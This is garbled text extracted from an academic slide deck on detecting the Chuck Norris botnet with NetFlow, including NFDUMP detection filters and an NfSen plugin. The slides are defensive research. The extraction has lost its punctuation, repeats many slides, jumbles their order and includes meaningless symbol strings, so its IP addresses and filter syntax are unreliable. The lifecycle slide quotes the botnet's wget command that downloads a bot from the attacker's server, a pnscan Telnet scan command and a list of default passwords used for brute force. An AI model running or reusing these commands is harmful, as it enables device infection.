Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Part I
NetFlow Monitoring at MU
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 3 28
Masaryk University Brno Czech Republic
9 faculties 200 departments and institutes48 000 students and employees15 000 networked hosts2x 10 gigabit uplinks to CESNET
Interval Flows Packets Bytes
Second 5 k 150 k 132 MMinute 300 k 9 M 8 GHour 15 M 522 M 448 GDay 285 M 94 G 8 TWeek 16 G 57 G 50 T
Average traffic volume at the edgelinks in peak hours
0
500000
1000000
1500000
Mon Tue Wed Thu Fri Sat Sun
Number of Flows in MU Network (5-minute Window)
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 4 28
FlowMon Probes at Masaryk University Campus
FlowMon probes NetFlow collectors
256
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 5 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
http
syslog
incident
reporting
mailbox
WWW
syslog
server
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Masaryk University Brno Czech Republic
9 faculties 200 departments and institutes48 000 students and employees15 000 networked hosts2x 10 gigabit uplinks to CESNET
Interval Flows Packets Bytes
Second 5 k 150 k 132 MMinute 300 k 9 M 8 GHour 15 M 522 M 448 GDay 285 M 94 G 8 TWeek 16 G 57 G 50 T
Average traffic volume at the edgelinks in peak hours
0
500000
1000000
1500000
Mon Tue Wed Thu Fri Sat Sun
Number of Flows in MU Network (5-minute Window)
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 4 28
FlowMon Probes at Masaryk University Campus
FlowMon probes NetFlow collectors
256
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 5 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
http
syslog
incident
reporting
mailbox
WWW
syslog
server
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
